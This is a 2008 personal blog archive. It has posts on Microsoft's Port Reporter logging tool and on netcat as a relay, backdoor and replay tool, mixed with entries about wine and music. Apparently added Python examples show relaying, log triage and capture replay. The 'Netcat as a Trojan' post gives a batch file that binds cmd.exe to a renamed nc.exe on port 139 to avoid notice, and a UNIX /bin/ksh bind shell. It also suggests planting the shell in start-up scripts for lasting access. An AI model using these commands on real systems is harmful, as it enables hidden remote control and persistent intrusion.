Thursday, 28 August 2008

The "Port Reporter" tool by Microsoft.

The Microsoft Port Reporter tool logs TCP and UDP ports as they are opened and closed. This produces a log that can be used to see what has occurred on a system over time, which is particularly useful for reconstructing malware actions over time and even for determining whether a host has been compromised.

Windows Server 2003, Windows XP and Windows 2000 systems support the Port Reporter service. It can be used to record the following information:

  • The ports that are used
  • The processes that use the port
  • Whether a process is a service
  • The modules that a process loaded
  • The user accounts that run a process

Port Reporter will (if available) create its log files in the folder:

The service creates several logs; these include the following:

  • The PR-INITIAL log file holds information collected on the ports, processes and modules that are running on the host when the Port Reporter service starts.
  • The PR-PORTS log holds information on all TCP and UDP port activity on the system in CSV format. It holds the following fields: date, time, protocol, local port, local IP address, remote port, remote IP address, PID, module, user context (this is slightly different on Windows 2000).
  • The PR-PIDS log holds detailed data covering the ports, processes, related modules and the user account that each process is running as.

The user context that each process is running under is also logged.

This is a great free tool from Microsoft.

Wednesday, 27 August 2008

Netcat - Last but not least

Netcat is also able to be used as a Forwarder and Relay.

I am not going to go into detail here, but if you think about it, there is no reason why a single netcat listener is the end of what you can do. Chaining netcat lets it pass through multiple layers and systems. In pen-tests, red teaming and even on the darker side of the fence, this technique is used to "drill" through firewalls and security systems.

More than this, netcat can chain across different protocols. It is possible to pipe one connection type into another. That is, a connection arriving on DNS (UDP 53) can be passed on as HTTP (TCP 80), and so on.

All of this just touches the surface of what netcat does. I would suggest that you search and find out more. Feel free to post comments; there are always more uses of netcat and the other readers would love to read yours.
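To make the chaining idea concrete, here is a small TCP forwarder in Python, added as an illustration and not code from this post or from the netcat project. Two forwarders are pointed at each other and then at a stand-in echo server, all on loopback; the addresses are constructed (port 0 lets the OS pick), and the echo server exists only so the chain can be exercised offline.

```python
"""Chaining TCP hops in Python, as an added illustration of the netcat
relay idea.  This is not code from the post or the netcat project; the
hop addresses are constructed loopback values and the "far end" is a
stand-in echo server so the chain can be exercised offline."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src's peer finishes, then pass the
    end-of-stream on by shutting dst's write side (what a FIN looks like
    when it travels through a netcat hop)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay(listen_addr, target_addr, once=True):
    """Accept a client on listen_addr, connect onward to target_addr and
    pump both directions.  Returns the address actually bound, so a caller
    may listen on port 0 and discover the port.  Each hop is independent:
    point one relay at another and the client only ever sees the first."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen_addr)
    srv.listen(5)

    def serve():
        while True:
            client, _ = srv.accept()
            upstream = socket.create_connection(target_addr)
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
            if once:
                break
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


def echo_server():
    """Stand-in for the final host behind the hops: returns what it gets,
    upper-cased so a reply is recognisably from the far end."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


def chained_roundtrip(payload):
    """client -> hop1 -> hop2 -> echo server, and the reply back through
    the same two hops.  Returns the bytes the client receives."""
    final = echo_server()
    hop2 = relay(("127.0.0.1", 0), final)
    hop1 = relay(("127.0.0.1", 0), hop2)
    with socket.create_connection(hop1) as client:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)  # nothing more to send; let the FIN travel the chain
        chunks = []
        while True:
            data = client.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print(chained_roundtrip(b"hello through two hops"))
```

The same skeleton with a SOCK_DGRAM listener on the inbound side and a TCP connection on the outbound side is what "piping DNS into HTTP" amounts to; the forwarder does not care what the bytes mean, which is exactly why firewalls that only look at port numbers do not stop it.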

Naughtier Netcat

Netcat can also be used as a backdoor into a system and a remote shell.
Netcat as a Trojan

It seems all too easy....

  • @echo off
  • winsys.exe -L -d -p 139 -t -e cmd.exe

Note that "winsys.exe" in the above command is really just "nc.exe" on our Windows host; we have simply renamed it, so that what appears in the process list is less likely to be recognised.

Once you have run the script on the host that you wish to Trojanise, connect to it with netcat (the -t flag above answers telnet negotiation, so a plain telnet client also works):

  • # nc -v [IP address of target] [port]

On UNIX we can do something similar. The following starts netcat in listen mode and hands each connection to a shell:

  • # nc -l -p [port] -e /bin/ksh

Note that -e only exists in netcat builds compiled with the GAPING_SECURITY_HOLE option; many distribution packages leave it out.

Of course, you can listen on either TCP or UDP. In fact, adding this line to a start-up script could allow an attacker to selectively send connections to the valid service or to the "Trojan" shell (compare how TCP Wrappers dispatch connections).

For instance, if an attacker gets shell access through a DNS vulnerability in BIND, the attacker could install a netcat start-up entry to allow future access whilst patching the issue to stop further attacks (and keep the server for themselves).

Even simple tools can be used in both positive and negative ways.
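The renamed listener above is exactly the kind of thing the Port Reporter log described in the 28 August post will record, so here is an added example (not Microsoft's code and not from this post) that parses PR-PORTS style records and flags a module using a well-known port it is not expected to own. The field order is the one that post lists; the log lines, the "winsys.exe" process and the per-port baseline are all constructed for the example.

```python
"""Triage of PR-PORTS records, added as an example for the Port Reporter post
and for the renamed-netcat listener above.  It is not Microsoft's code; the
field order is the one the post lists for the PR-PORTS CSV log, the log lines
are constructed for this example, and the per-port baseline is a hypothetical
one for a single host."""
import csv
from collections import defaultdict
from dataclasses import dataclass
from io import StringIO

# Field order as given in the post for PR-PORTS.
FIELDS = ["date", "time", "protocol", "local_port", "local_ip",
          "remote_port", "remote_ip", "pid", "module", "user"]

# Constructed records: a web server, an outbound DNS lookup, and a renamed
# netcat ("winsys.exe", as in the Trojan batch file) serving cmd.exe on TCP 139.
SAMPLE_LOG = """\
# constructed PR-PORTS style lines; not real Port Reporter output
08/28/2008,21:03:11,TCP,80,192.0.2.10,51200,198.51.100.7,1640,inetinfo.exe,NT AUTHORITY\\SYSTEM
08/28/2008,21:03:14,UDP,1027,192.0.2.10,53,192.0.2.1,1016,svchost.exe,NT AUTHORITY\\NETWORK SERVICE
08/28/2008,21:04:02,TCP,139,192.0.2.10,40110,198.51.100.9,2280,winsys.exe,NT AUTHORITY\\SYSTEM
08/28/2008,21:04:02,TCP,139,192.0.2.10,40111,198.51.100.9,2280,winsys.exe,NT AUTHORITY\\SYSTEM
"""

# Hypothetical baseline: which module is allowed to own each well-known local
# port on this host (lower-cased module names).
BASELINE = {("TCP", 80): {"inetinfo.exe"}, ("TCP", 139): {"system"}}


@dataclass(frozen=True)
class PortRecord:
    date: str
    time: str
    protocol: str
    local_port: int
    local_ip: str
    remote_port: int
    remote_ip: str
    pid: int
    module: str
    user: str


def parse_pr_ports(text):
    """Parse PR-PORTS style CSV text into PortRecord objects, skipping blank
    lines and '#' comment lines; a row with the wrong field count is an error
    rather than a silent skip."""
    records = []
    for row in csv.reader(StringIO(text)):
        if not row or row[0].lstrip().startswith("#"):
            continue
        if len(row) != len(FIELDS):
            raise ValueError("unexpected field count %d in %r" % (len(row), row))
        f = dict(zip(FIELDS, (v.strip() for v in row)))
        records.append(PortRecord(f["date"], f["time"], f["protocol"].upper(),
                                  int(f["local_port"]), f["local_ip"],
                                  int(f["remote_port"]), f["remote_ip"],
                                  int(f["pid"]), f["module"], f["user"]))
    return records


def ports_by_module(records):
    """Map each module name to the sorted list of (protocol, local port) it used."""
    seen = defaultdict(set)
    for r in records:
        seen[r.module.lower()].add((r.protocol, r.local_port))
    return {m: sorted(ports) for m, ports in seen.items()}


def unexpected_port_owners(records, baseline=BASELINE, well_known_max=1024):
    """Return one record per (pid, module, protocol, local port) where a
    well-known local port is used by a module that the baseline does not
    allow for that port.  A PR-PORTS line does not say whether the port is
    listening, so this deliberately judges on the local port alone."""
    hits, keyed = [], set()
    for r in records:
        if r.local_port > well_known_max:
            continue
        allowed = baseline.get((r.protocol, r.local_port), set())
        key = (r.pid, r.module.lower(), r.protocol, r.local_port)
        if r.module.lower() not in allowed and key not in keyed:
            keyed.add(key)
            hits.append(r)
    return hits


if __name__ == "__main__":
    for hit in unexpected_port_owners(parse_pr_ports(SAMPLE_LOG)):
        print("%s %s pid=%d %s/%d module=%s as %s" % (
            hit.date, hit.time, hit.pid, hit.protocol, hit.local_port, hit.module, hit.user))
```

Renaming nc.exe hides it from a casual glance at the process list, but it does not change which port the process owns, who it runs as, or that the module name is not the one the baseline expects for that port; that is the check worth running over the PR-PORTS log.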

Naughty, Naughty Netcat

Netcat can be used as a replay attack engine. It works well for this purpose and is simple to use. The first step is to collect the data stream that you want to replay. This can be done by using another tool to create the stream, or by capturing one (with tcpdump or Wireshark) and altering the parts that do not fit.

That is, change the times, IP addresses, destinations, values, etc., so that the captured stream suits what you want.

To replay the data, netcat in client mode will suffice:
$ cat file.capture.bin | nc [destination IP] [port]

or even:
$ nc [destination IP] [port] < file.capture.bin

Either will work.

Netcat in listen mode, tcpdump or Wireshark can be used to make the initial capture.

tcpreplay works better for replaying a packet capture, but netcat just looks cooler (in a geek sense).
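The step that trips people up is the editing: once you change a value in the captured stream, anything that describes the stream (for HTTP, the Content-Length header) has to be fixed too, or the far end waits for bytes that never arrive. The following is an added example of that edit-then-replay cycle in Python; it is not the post's own commands and not tcpreplay, and the captured request, the replacement values and the loopback "target" are all constructed for the example.

```python
"""Replaying an edited capture, added as an example of the replay idea in
this post.  It is not the post's own commands and not tcpreplay; the
captured request, the replacement values and the loopback "target" are all
constructed for the example."""
import socket
import threading

# Constructed capture of one HTTP/1.0 request, as a "Follow TCP stream" in
# Wireshark (or a netcat listener) would hand it over.
CAPTURED = (b"POST /login HTTP/1.0\r\n"
            b"Host: 192.0.2.10\r\n"
            b"Date: Wed, 27 Aug 2008 10:00:00 GMT\r\n"
            b"Content-Length: 23\r\n"
            b"\r\n"
            b"user=alice&session=1234")


def rewrite_capture(raw, host=None, date=None, body_subs=()):
    """Return raw with the Host and Date headers replaced and the body
    substitutions applied.  Content-Length is recomputed from the edited
    body: a replayed stream whose declared length no longer matches is the
    usual reason an edited capture is rejected or hangs the far end."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("capture has no header/body boundary")
    for old, new in body_subs:
        body = body.replace(old, new)
    lines = []
    for line in head.split(b"\r\n"):
        name = line.split(b":", 1)[0].strip().lower()
        if host is not None and name == b"host":
            line = b"Host: " + host
        elif date is not None and name == b"date":
            line = b"Date: " + date
        elif name == b"content-length":
            line = b"Content-Length: %d" % len(body)
        lines.append(line)
    return b"\r\n".join(lines) + sep + body


def replay(data, addr, timeout=5.0):
    """Send the bytes exactly as given (what netcat in client mode does)
    and collect the reply until the far end closes."""
    with socket.create_connection(addr, timeout=timeout) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            piece = s.recv(4096)
            if not piece:
                break
            chunks.append(piece)
    return b"".join(chunks)


def capture_sink():
    """Loopback stand-in for the target: records what arrives and answers
    with the byte count, so the replay can be checked offline.  Returns the
    bound address and the list the received stream is appended to."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    received = []

    def serve():
        conn, _ = srv.accept()
        with conn:
            buf = b""
            while True:
                piece = conn.recv(4096)
                if not piece:
                    break
                buf += piece
            received.append(buf)
            conn.sendall(b"got %d bytes" % len(buf))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname(), received


def demo():
    """Edit the capture for a new target and session, replay it to the sink
    and return (edited stream, what the sink saw, the sink's reply)."""
    edited = rewrite_capture(CAPTURED, host=b"198.51.100.5",
                             date=b"Thu, 28 Aug 2008 09:30:00 GMT",
                             body_subs=[(b"session=1234", b"session=98765")])
    addr, received = capture_sink()
    reply = replay(edited, addr)
    return edited, received[0], reply


if __name__ == "__main__":
    edited, seen, reply = demo()
    print(edited.decode())
    print(reply.decode())
```

With a real capture file the same two steps apply: rewrite the bytes on disk, then the one-line netcat command above sends them; the function here only replaces the file and the pipe with in-memory bytes so the round trip can be checked.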

Tuesday, 26 August 2008


Tonight I am not studying (in the general sense). This is a change for me.

I have a bottle of wine: a well aged Penfolds Cabernet Sauvignon (1995 vintage). How to put it: plum red, with a nose of tobacco leaf, cedar and capsicum, and a light vanilla with a slight aftertaste. The tannins are mild and it is drinking well now. I do not see much more time for this wine; it is at, or just past, its peak and needs to be drunk now.

I have a mixed vegetable lasagne with a rich capsicum sauce and nutmeg béchamel.

I have Handel's Messiah sung by the Oxford New College Choir. I listened to George Frideric Handel prior to this with the piece Rinaldo. This is to be followed by Dave Brubeck's album, "Jazz: Red Hot and Cool". Later, Frank Sinatra's album - In The Wee Small Hours.

Later tonight I leave the computer to download Java Security courses, my latest SANS courses and MP3s and a number of books I have purchased online. Later I will watch a movie - Ruins (2007) that I purchased today to watch on the screen with my wife.

Once in a while even I have a break from study and writing.

Tomorrow - back to the DNS paper, my statistics dissertation and work. I have a cryptocurrency paper out soon. Twenty years. Triple entry bookkeeping. BDO was good for something.

Tomorrow, Wolfgang Amadeus Mozart. Which piece, well that is still undecided.

Monday, 25 August 2008

My Latest Plan

Unlike most people, I have realised the value of time since I was a youth. My latest addition to my goals is to listen to the 90,000 most influential pieces of music throughout history (as judged by myself). This is a 20-year plan.

Tonight I have Hildegard von Bingen playing, in this case Canticles of Ecstasy. This consists of the following works:

  • O Vis Aeternitatis
  • Nunc Aperuit Nobis
  • Quia Ergo Femina Mortem Instruxit
  • Cum Processit Factura Digiti Dei
  • Alma Redemptoris Mater
  • Ave Maria, O Auctrix Vite
  • Spiritus Sanctus Vivificans Vite
  • O Ignis Spiritus Paracliti
  • Caritas Habundat In Omnia
  • O Virga Mediatrix
  • O Viridissima Virga, Ave
  • Instrumentalstück (Instrumental Piece)
  • O Pastor Animarum
  • O Tu Suavissima Virga
  • O Choruscans Stellarum
  • O Nobilissima Viriditas

Hildegard of Bingen was born in 1098 and at 14 entered a Benedictine nunnery outside Worms (in the Rhineland). She became abbess in 1136 and subsequently moved her order to Rupertsberg, outside Bingen.

She composed 77 vocal works (including 43 Antiphons) collectively known as the Symphonia armonie celestium revelationum.

This is a truly mystic collection of vocal works. A great reflective collection.

On top of this I also listened to Symphony No. 8 by Dmitri Shostakovich, in the 1988 performance conducted by Yevgeny Mravinsky. This is reflective, bitterly powerful and emotionally transcendent: a dark and brooding work reflecting a true depth of emotion and experience that I cannot begin to comprehend.

Yet in it lies hope.

George Frideric Handel - Messiah (1742)